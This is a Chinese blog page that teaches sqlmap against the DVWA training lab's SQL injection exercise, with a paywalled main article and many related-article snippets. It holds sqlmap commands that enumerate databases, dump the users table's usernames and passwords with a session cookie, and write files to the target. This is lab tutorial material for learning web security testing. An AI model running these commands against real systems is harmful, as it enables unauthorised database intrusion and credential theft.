sqlmap的使用(基于dvwa的靶场实验)

最新推荐文章于 2025-06-15 15:14:20 发布

_j0k3r

最新推荐文章于 2025-06-15 15:14:20 发布

阅读量1.3k

点赞数 2

CC 4.0 BY-SA版权

文章标签： sql 数据库 web安全

本文链接：https://blog.youkuaiyun.com/weixin_66669317/article/details/128219502

本文详细介绍如何使用SQLMap工具对不同安全级别的DVWA靶场进行SQL注入攻击，包括Low、Medium、High及Impossible级别，并演示了如何获取敏感信息。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

这是一次基于DVWA靶场下sql injection的对sqlmap的测试

low等级

先输入一个1进去查看反应

发现还是有反应的，并且url中也有体现，直接输入命令

sqlmap -u " //测试的网址url// "

在sqlmap跑的过程中会有一些需要选择的地方，直接无脑选y回车就行

从这里可以看到存在注入点

开始注入

sqlmap -u " //测试的网址url// " --dbs

爆出数据库名

继续

sqlmap -u " //测试的网址url// " -D dvwa --tables

最低0.47元/天解锁文章

200万优质内容无限畅学

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

_j0k3r

关注关注

2
点赞
踩
8

收藏

觉得还不错? 一键收藏
1
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

打靶场教学使用sqlmap

逍遥小哥的博客

02-02

655

sqlmap -r 1.txt --batch --current-db （--current-db就是判断网站是什么数据库的，--batch是自动化执行交互，不需要用户交互了）sqlmap -r ss.txt --batch --is-dba 判断当前用户是不是管理员权限。sqlmap -r ss.txt --batch --privileges 获取数据库用户的权限。sqlmap -r ss.txt --batch --current-user 获取当前用户。

DVWA靶场-SQL Injection（难度低、中、高）-sqlmap自动化漏洞扫描

weixin_43850721的博客

12-14

3130

此处使用docker容器搭建靶场。使用docker平台即可实现靶场的快速搭建，比较方便。使用docker搜索dvwa镜像：docker search dvwa。此处选择第一个镜像文件下载：docker pull citizenstig/dvwa。下载完毕后，可以使用docker images来查看所有的镜像，从中可以找到dvwa。

1 条评论您还未登录，请先登录后发表或查看评论

web安全之通过sqlmap工具进行靶场练习

记录学习，一起进步

12-07

1247

web安全之通过sqlmap工具对靶场进行练习

sqlmap扫描DVWA靶场（sql注入低、中、高）

xingxin32的博客

06-15

598

二、打开kali，在网页输入搭建好dvwa主机的IP（ps：Windows系统IP查询命令ipconfig，Linux系统IP查询命令ifconfig）6.点开Repeater，并修改代码为id=1 or 1=1（注意：这里根据kali版本的不同，有些需要后面加#，有些不需要）Windows电脑、下载phpstudy、搭建好dvwa靶场、里面有kali、sqlmap、burpsuite等软件。4.-D 数据库名 -T 表名 -C "字段,字段" --dump 获取表字段对应的数据。

DVWA靶场 -如何使用sqlmap 工具get注入

xiaojiadong2019的博客

10-19

678

SQL注入是将Web页面的原URL、表单域或数据包输入的参数，修改拼接成SQL语句，传递给Web服务器，进而传给数据库服务器以执行数据库命令。如Web应用程序的开发人员对用户所输入的数据或cookie等内容不进行过滤或验证(即存在注入点)就直接传输给数据库，就可能导致拼接的SQL被执行，获取对数据库的信息以及提权，发生SQL注入攻击。注入点初步测试，输入框输入单引号'出现报错，可以看出该输入框存在注入点，且数据库是MySQL数据库。2、通过注入点，尝试获取数据库相关基本信息。2、使用Sqlmap工具测试。

6个步骤轻松实现 postman 接口压力测试（建议收藏），2024年最新2024阿里软件测试高级面试题总结

2401_84240431的博客

04-15

1116

行业的老鸟或是对IT行业感兴趣的新人，都欢迎加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！

渗透测试---手把手教你sqlmap数据库注入测试(1)---靶场实战篇_sqlmap靶场

2401_83621499的博客

04-11

1426

新**

sqlmap在windows上执行sql注入，利用dvwa靶场.md

05-19

分享一下自己学习sqlmap的过程，因为网上的资源很少，所以就想着写个博客记录一下，同时也分享一下吧。就先讲到这里吧，有问题的可以私信。欢迎大家提意见。

【渗透测试】 sqlmap工具注入-基于dvwa的sql injection_dvwa sql注入 sqlmap

2401_84968269的博客

05-13

1270

自我介绍一下，小编13年上海交大毕业，曾经在小公司待过，也去过华为、OPPO等大厂，18年进入阿里一直到现在。深知大多数网络安全工程师，想要提升技能，往往是自己摸索成长，但自己不成体系的自学效果低效又漫长，而且极易碰到天花板技术停滞不前！因此收集整理了一份《2024年网络安全全套学习资料》，初衷也很简单，就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料，也有适合3年以上经验的小伙伴深入学习提升的进阶课程，基本涵盖了95%以上网络安全知识点！真正的体系化！

sqlmap在windows上执行sql注入，利用dvwa靶场

m0_46315342的博客

05-19

1064

sqlmap在windows上执行sql注入，利用dvwa靶场 1.首先你要安装好sqlmap并且配置好坏境，不知道的百度搜索吧，还是比较简单的。 2.先安利一个博主手工注入的博客吧，建议学的时候先手工注入明白原理，体验一下痛楚，哈哈哈哈。 https://blog.youkuaiyun.com/qq_36119192/category_8345945.html 3.接下来我分享一下我的sqlmap注入过程 ··1网上很多都是在kali linux上执行的，但是别人建议新手小白先不要用这个，所以我就在windows上执

最全sqlmap命令

gzy1616的博客

03-06

792

-search 搜索数据库名、表明、列名，需要与-D -T或-C 联用。--columns 在-D -T情况下输出表中所有列名。-C column 在-D -T情况下输出某列数据的值。--tables 在-D情况下输出库中所有表名。--file-dest 上传文件（指定目标机器路径）--file-write 上传文件（指定本地路径）

SQL注入工具sqlmap安装使用详解&靶场实验

05-14

1160

SQL注入工具sqlmap安装使用详解&靶场实验，还有SQL注入攻击流程和MySQL攻击思路解读。

搭建DVWA测试环境和SQL注入之SQLmap入门

xueyunzi1的博客

08-03

615

开发十年，就只剩下这套Java开发体系了 >>> ...

渗透测试---手把手教你sqlmap数据库注入测试---靶场实战教程建议收藏！

白帽阿叁的博客

05-26

923

SQLMap，就像它的名字所暗示的，是一个为我们提供方便的“SQL注入攻击”的工具。对于那些不熟悉这个概念的人来说，SQL注入是一种黑客攻击技术，允许攻击者在目标网站的数据库中执行恶意SQL语句。这意味着我们可以控制和操纵网站的数据，甚至可以完全接管整个网站。那么SQLMap如何帮助我们实现这些呢？首先，SQLMap可以帮助发现存在SQL注入漏洞的网站。它会进行自动化的扫描和检测，找出可能的注入点。

【史上最全sqlmap通关sqli-labs靶场教程】

DMXA的博客

10-15

7041

【史上最全sqlmap通关sqli-labs靶场教程】

sqlmap的使用方法（含靶场）

0nc3的博客

11-06

8001

0x00 sqlmap简介 Sqlmap的7种等级：常用–leve 3 0x01 mysql数据库的注入靶场地址：http://59.63.200.79:8003 查看数据库名 sqlmap -u "http://59.63.200.79:8003/?id=1" --dbs 查看表 sqlmap -u "http://59.63.200.79:8003/?id=1" -D maoshe...

sqlmap学习，打靶sqli-labs.(1-19)

shdbehdvd的博客

11-25

993

sqlmap学习日志.

使用sqlmap完成sql注入DVWA

dongf2019的博客

12-12

1551

------------------------------------------------------------------------------------------------------运行结果。4、在kali中启动firefox浏览器，设置代理为127.0.0.1，端口为8080，访问dvwa的sql injection页面，输入1，submit。显示出users表格所以数据，其中用户密码已经从MD5还原为明文。2、启动dvwa，启动后地址为192.168.88.128。

sqlmap跑dvwa靶场sqlmap自动注入

最新发布

07-18

### DVWA靶场中使用sqlmap进行SQL注入测试 DVWA（Damn Vulnerable Web Application）是一个专门用于安全测试和学习的脆弱Web应用，它提供了多个漏洞场景，包括SQL注入。通过sqlmap工具可以对DVWA靶场进行自动化SQL注入测试，从而快速发现和利用SQL注入漏洞。 #### 基本步骤 1. **设置DVWA环境** DVWA的数据库配置通常如下： ```php $_DVWA[ 'db_server' ] = '127.0.0.1'; // 数据库地址 $_DVWA[ 'db_database' ] = 'dvwa'; // 数据库名称 $_DVWA[ 'db_user' ] = 'root'; // 数据库用户名 $_DVWA[ 'db_password' ] = 'root'; // 数据库密码 ``` 确保数据库服务正常运行，并且DVWA的配置文件指向正确的数据库信息[^4]。 2. **启动DVWA并登录** 在浏览器中访问DVWA的登录页面，默认用户名为`admin`，密码为`password`。登录后，将安全级别设置为`low`或`medium`，以便更容易进行SQL注入测试。 3. **获取Cookie信息** 在使用sqlmap进行测试时，需要提供会话Cookie以保持登录状态。可以通过浏览器的开发者工具查看当前会话的Cookie信息，例如： ``` security=low; PHPSESSID=nntokg4euk42c5cemkh41et470 ``` 4. **运行sqlmap命令** 使用sqlmap对DVWA的SQL注入点进行测试时，可以使用如下命令： ```bash sqlmap.py -u "http://192.168.199.16/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=nntokg4euk42c5cemkh41et470; security=low" --data "id=1&Submit=Submit" ``` 这条命令指定了目标URL、Cookie以及POST请求中的数据内容[^2]。 5. **探测数据库信息** 如果确认存在SQL注入漏洞，可以进一步探测数据库信息。例如，获取数据库名称、表名和列名： ```bash sqlmap -u "http://192.168.199.16/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=nntokg4euk42c5cemkh41et470; security=low" --dbs ``` 6. **获取指定表和列的数据** 在确定数据库名称后，可以获取特定表和列的数据。例如，获取`dvwa`数据库中`users`表的`user`和`password`列： ```bash sqlmap -u "http://192.168.199.16/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=nntokg4euk42c5cemkh41et470; security=low" -D dvwa -T users -C user,password --dump ``` 这条命令会将`users`表中的`user`和`password`列的数据导出[^3]。 #### 注意事项 - **安全级别设置** DVWA提供了不同的安全级别（low、medium、high），不同级别的SQL注入漏洞防护机制不同。建议从`low`级别开始测试，逐步提高难度。 - **Cookie的有效性** 在使用sqlmap时，确保提供的Cookie信息是有效的，否则可能导致请求失败。 - **避免过度扫描** 在高安全级别下，DVWA可能会记录多次错误请求并阻止进一步的访问。因此，建议合理设置sqlmap的扫描参数，避免频繁触发安全机制。 - **合法性和道德规范** SQL注入测试应在合法授权的范围内进行，未经授权对系统进行攻击是违法行为。 ####